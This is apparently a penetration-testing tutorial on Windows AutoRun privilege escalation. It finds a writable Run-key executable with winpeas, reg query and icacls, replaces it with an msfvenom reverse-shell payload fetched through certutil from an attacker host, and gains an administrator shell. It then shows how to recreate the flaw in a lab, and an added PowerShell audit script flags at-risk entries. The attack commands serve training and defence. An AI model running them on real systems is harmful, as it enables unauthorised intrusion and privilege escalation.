Autorun applications in Windows are programs or processes that are set to run automatically when the operating system starts up. These programs can be configured to run automatically in several ways, such as by adding them to the Startup folder, or by using the Windows registry.
AutoRuns can also be abused by attackers, who can add malicious programs to the list of auto-start programs. This can happen if an attacker gains access to a Windows system and is able to add their own code to the list of startup programs, or to overwrite an executable that is already registered there. When a user logs in to the system, the malicious program automatically runs with the same privileges as that user. This means that the attacker cannot escalate privileges unless an Admin logs into the machine.
What you’ll learn
- How to enumerate for AutoRuns using winpeas
- How to enumerate for AutoRuns manually
- How to exploit AutoRuns
- How to replicate the vulnerability
Enumerating for the Vulnerability
Scenario: We have a user level shell as “user1” and want to escalate privileges.
For the first example, let's find the AutoRuns vulnerability with winpeas.exe.
To bring the winpeas executable from Kali to Windows, let's first host a Python web server on Kali:
python3 -m http.server 80
Then, let's use certutil.exe to download the file:
certutil.exe -urlcache -f http://192.168.4.4/winpeas.exe winpeas.exe
Once it's downloaded we can run it with the "applicationsinfo" option. Looking through the output, we can see this.
We see that the executable “app123.exe” in the “C:\applications\” directory is set to autorun. Winpeas also shows us that we have permissions to write to this directory.
For the second enumeration example, let's try to find this vulnerability manually.
Let's first list all of the AutoRun applications registered in the machine-wide Run key. The first two autoruns are not very interesting, but we can further enumerate the third one.
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Let's use icacls to check if we have write privileges on app123.exe.
icacls C:\applications\app123.exe
- (F): This represents the permissions granted to the user or group. In this case, it stands for “Full Control”, which means the user has permission to read, write, modify, and execute the file.
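The same check can be scripted from the defender's side: the added PowerShell audit below (not part of the original post, and not winpeas code) walks the HKLM Run keys, resolves each executable, and reports entries whose file or parent directory grants write access to the usual low-privileged groups. The group names and key list are assumptions about a standard Windows build.

```powershell
# Added audit example: flag HKLM Run entries that a standard user could overwrite.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)
# Identities that a standard (non-admin) user typically belongs to (assumed names).
$lowPriv   = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
# Any of these rights lets the principal change the file or drop a file into the directory.
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, WriteData, AppendData'

function Get-ExePath([string]$value) {
    # Expand %VAR% references and strip quotes/arguments from a Run value,
    # e.g. "C:\applications\app123.exe" /silent  ->  C:\applications\app123.exe
    $value = [Environment]::ExpandEnvironmentVariables($value)
    if ($value -match '^"([^"]+)"') { return $Matches[1] }
    return ($value -split '\s+')[0]   # unquoted paths containing spaces are a known gap
}

function Test-LowPrivWrite([string]$path) {
    # True if any Allow ACE for a low-privileged identity carries a write-class right.
    $acl = Get-Acl -LiteralPath $path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    $names = $props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' } | Select-Object -ExpandProperty Name
    foreach ($name in $names) {
        $exe = Get-ExePath $props.$name
        if (-not (Test-Path -LiteralPath $exe)) { Write-Warning "$key\$name -> missing target $exe"; continue }
        $fileWritable = Test-LowPrivWrite $exe
        $dirWritable  = Test-LowPrivWrite (Split-Path -Parent $exe)
        [pscustomobject]@{
            Key          = $key
            Entry        = $name
            Executable   = $exe
            FileWritable = $fileWritable
            DirWritable  = $dirWritable
            AtRisk       = ($fileWritable -or $dirWritable)
        }
    }
}
```

Rows with AtRisk set to True are the entries to fix by tightening the file and directory ACLs; a missing-target warning is also worth a look, since an attacker could create the absent file.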
Exploiting AutoRuns
Exploiting this vulnerability is pretty simple. All we have to do is replace the autoruns executable with our own executable.
First, let's create a malicious exe file using msfvenom. Make sure to give this file the same name that the autorun application had.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.4.4 LPORT=53 --platform Windows -f exe > app123.exe
Now we host a Python web server on Kali just like we did for winpeas, and use certutil.exe to transfer the reverse shell executable to Windows.
certutil.exe -urlcache -f http://192.168.4.4/app123.exe app123.exe
Before we move the reverse shell executable to the C:\applications\ directory we should make a copy of the original executable.
move C:\applications\app123.exe C:\Users\user1\Desktop\app123.exe.bak
Now we can move the reverse shell executable to the C:\applications\ directory.
move app123.exe C:\applications\app123.exe
Let's start a netcat listener on our Kali machine.
To actually get the reverse shell to run, we need to shutdown/restart the machine and get an ADMIN to log in.
First, let's restart the machine using "shutdown /r".
To simulate this properly, I will play the role of an Admin and log into the Windows machine.
NOTE: In a REAL scenario an Admin might try to log into the machine a couple days or weeks later so this attack needs a little bit of luck.
Back on our netcat listener, we get a shell as the Administrator.
Replicate the AutoRuns Vulnerability
First, open registry editor with Admin privileges and navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Once you’re there, right click on the white space and click New > “String Value”
Enter a name for it. Then right click it and select modify.
In the “Value data:” section, set the path to the executable you want to set to autostart.
Once all of that is done, you want to make sure it's actually vulnerable. So now we need to give write permissions to a user so they're able to create files in the directory where the app123.exe file is located.
To do this, open File Explorer, right-click that directory and click on "Properties".
Go to the Security tab and click on Edit
Then click on “Add”
After that, enter the name of the user
Thanks for reading! If you found this post useful, be sure to share it.